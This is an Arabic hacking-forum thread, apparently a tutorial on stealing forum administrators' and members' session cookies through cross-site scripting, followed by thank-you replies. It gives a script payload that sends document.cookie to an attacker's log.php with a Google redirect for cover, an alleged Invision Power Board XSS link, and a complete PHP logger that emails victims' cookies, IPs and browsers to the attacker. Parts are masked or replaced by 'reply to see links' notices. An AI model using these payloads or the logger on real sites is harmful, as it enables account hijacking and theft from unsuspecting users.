**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط
بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط
طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني
بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه
مثلا نربطه بموقع عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل http://www.3asfh.net/vb/images/smilies/0056.gif (http://www.alqobor.com/vb/showthread.php?t=31313) وبكذا مايشك
بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس http://www.3asfh.net/vb/images/smilies/0056.gif (http://www.alqobor.com/vb/showthread.php?t=31313)
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
طبعا انت استبدل عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)
طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال
بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board
الكود للثغره :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط '>**********alert(document.******)</script>
احنا راح نستبدل :
كود PHP:
**********javascript:alert(document.******)</Script>
بـ
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
واستبدل هنا موقع جوجل باي موقع تبغاه
ورابط اللوج عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باللوج تبعك
====================
تطبيق :
التطبيق هنا :
كود PHP:
http://www.mahrum.com/forums/index.php?act=idx='>**********alert(document.******) </script>
===================
اللوج :
كود PHP:
<?php
// Thnx For Security 4 Arab - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet = "
[email protected]";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $HTTP_USER_AGENT;
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");
$Hdr = 'From: Logger <logger@secourty>';
$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For S4a ,, Security For Arab Forum -
- s4a -
- s4a froum -
---------------------------------------------------------------------
- This Script Coded By Devil-00 [ Devil From Palestine ] -
- <
[email protected]><
[email protected]><devil0f0p@ya hoo.com> -
---------------------------------------------------------------------
- IP ::- [ ' .$Ip.' ]
- System ::- [ '.$Sys.' ]
- The ****** ::- [ '.$id.' ]
- Time ::- [ '.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log <log.log> && -
---------------------------------------------------------------------
';
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
//
/* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */
if(isset($_GET["re"])){
$&@#&@#&@#&@#&@#&@#&@# = $_GET["re"];
if($&@#&@#&@#&@#&@#&@#&@# == ""){
mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$&@#&@#&@#&@#&@#&@#&@#);
}
}
//
?>
استبدل هنا :
كود PHP:
$ToGet = "
[email protected]";
الايميل: عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
بالايميل تبعك !
واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير اع التطبيق الا لانه درس عملي فقط لا أكثر ..
وبإمكانك استغلاله بثغره xss تبع cPanel
وغيرها من عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss
شكر على شرح رائع
- - - تم التحديث - - -
ما ظهرت روابط
meesho
01-07-2014, 05:37 PM
مشكور يااا خي نتمنى منك المزيد
commanderegy
01-09-2014, 01:54 PM
جزاك الله خيرا استمر.... بلتوفيق
VsemoV
01-12-2014, 02:18 PM
ماشاء الله عليك زي عادتك
- - - تم التحديث - - -
ماشاء الله مبدع زي عادتك:wink:
commanderegy
01-13-2014, 03:35 AM
جزاك الله خيرا...بالتوفيق تحياتي لك
NEXTGENHACKER
01-15-2014, 03:14 PM
مشكوووووووور الله يعطيك العافية
liamssi
01-15-2014, 04:21 PM
مشكووووووووووووووور و جاااازااك الله عنا كل خير
- - - تم التحديث - - -
مشكوووووووووووووووووووووو ر يا اخي لكن اين الروااااااااااااااابط ؟؟؟؟؟؟؟
هكر ديراوي
01-15-2014, 08:10 PM
يسلم ايديك
رائع
آستمــــــــــر
yahya22
01-20-2014, 12:37 AM
مبــدع انت تستاهل كل خير
The $niper
01-21-2014, 04:26 PM
مشكورررررررررررر
viva_gaza
01-22-2014, 01:40 AM
thaaaaaaaaaaaaaaaaaaaaaaaaaanx man
- - - تم التحديث - - -
thaaaaaaaaaaaaaaaaaaanx man
tabarkoinou
01-22-2014, 12:24 PM
:wink::):wink::)
stoko
01-22-2014, 04:00 PM
gooooooooooooooooooood
الله يعطيك العافيه
Powered by vBulletin® Version 4.2.6 by vBS Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.